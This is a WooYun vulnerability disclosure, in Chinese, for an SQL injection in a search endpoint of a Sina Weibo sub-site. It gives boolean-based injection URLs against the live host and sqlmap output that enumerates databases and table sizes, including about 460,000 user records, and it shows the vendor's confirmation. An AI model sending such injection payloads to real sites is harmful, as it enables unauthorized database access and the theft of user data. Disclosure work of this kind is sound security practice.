当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149138

漏洞标题:新浪微博某分站存在SQL注入漏洞 (46W+用户信息泄露)

相关厂商:新浪

漏洞作者: 路人甲

提交时间:2015-10-24 14:36

修复时间:2015-12-09 09:44

公开时间:2015-12-09 09:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-24: 细节已通知厂商并且等待厂商处理中
2015-10-25: 厂商已经确认,细节仅向厂商公开
2015-11-04: 细节向核心白帽子及相关领域专家公开
2015-11-14: 细节向普通白帽子公开
2015-11-24: 细节向实习白帽子公开
2015-12-09: 细节向公众公开

简要描述:

辣么多的用户量,能给个高危吗?

详细说明:

某搜索页面

http://daren.sc.weibo.com/h5/front/search


QQ20151024-2@2x.png


QQ20151024-3@2x.png


搜索的请求,AND 1=1

http://daren.sc.weibo.com/aj/h5/front/search?type=p&val=1%%27%20AND%201=1%20AND%20%27%%27=%27&page=1&_t=0&__rnd=1445667398522


QQ20151024-0@2x.png


AND 1=2

http://daren.sc.weibo.com/aj/h5/front/search?type=p&val=1%%27%20AND%201=2%20AND%20%27%%27=%27&page=1&_t=0&__rnd=1445667398522


QQ20151024-1@2x.png

漏洞证明:

QQ20151024-4@2x.png


available databases [3]:
[*] darentong
[*] information_schema
[*] test
[12:09:26] [INFO] fetched data logged to text files under '/Users/.sqlmap/output/daren.sc.weibo.com'


Database: darentong
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| daren_goods | 1610535 |
| `user` | 463933 |
| activity_user | 357809 |
| sku | 217527 |
| sku_value | 138078 |
| daren | 61920 |
| goods | 55510 |
| sku_attr | 45776 |
| `order` | 18762 |
| apply_settle | 11800 |
| cash | 10233 |
| pay_notify_order | 6929 |
| income | 5332 |
| pay_notify_payment_info | 4567 |
| goods_group | 4051 |
| pay_trade_info | 3250 |
| pay_dis_application | 2375 |
| pay_trade_account | 2250 |
| merchant | 1890 |
| crm_top_apply | 1757 |
| crm_merchant | 1576 |
| crm_account | 1529 |
| classification | 1353 |
| category_goods | 1223 |
| category_merchant | 579 |
| adtask | 307 |
| crm_user | 259 |
| refund | 191 |
| pay_re_application | 111 |
| pay_re_plan | 110 |
| crm_agent_apply | 81 |
| operator | 34 |
| express | 23 |
| refund_reason | 18 |
| kv | 8 |
| category | 6 |
| address | 4 |
| pay_merchant_pay_info | 2 |
+-------------------------+---------+

修复方案:

给个高危吧!!!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-10-25 09:42

厂商回复:

漏洞确认,感谢您的支持

最新状态:

暂无


漏洞评价:

评论

  1. 2015-10-24 15:38 | 4fun ( 路人 | Rank:10 漏洞数:1 | 很无语啊)

    什么叫分站?